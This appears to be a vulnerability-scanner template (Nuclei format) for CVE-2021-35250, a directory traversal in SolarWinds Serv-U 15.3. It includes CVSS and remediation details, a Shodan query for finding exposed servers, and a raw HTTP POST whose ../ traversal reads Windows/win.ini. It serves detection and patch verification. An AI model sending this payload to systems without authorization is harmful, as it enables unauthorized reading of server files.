id: CVE-2021-35250

info:
  name: SolarWinds Serv-U 15.3 - Directory Traversal
  author: johnk3r,pdteam
  severity: high
  description: |
    SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/rissor41/SolarWinds-CVE-2021-35250
    - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US
    - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250
    - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35250
  remediation: Resolved in Serv-U 15.3 Hotfix 1.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35250
    cwe-id: CWE-22,CWE-538
    epss-score: 0.04209
    cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: product:"Rhinosoft Serv-U httpd"
    vendor: solarwinds
    product: serv-u
  tags: cve,cve2021,solarwinds,traversal

http:
  - raw:
      - |
        POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        /?Command=NOOP

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 401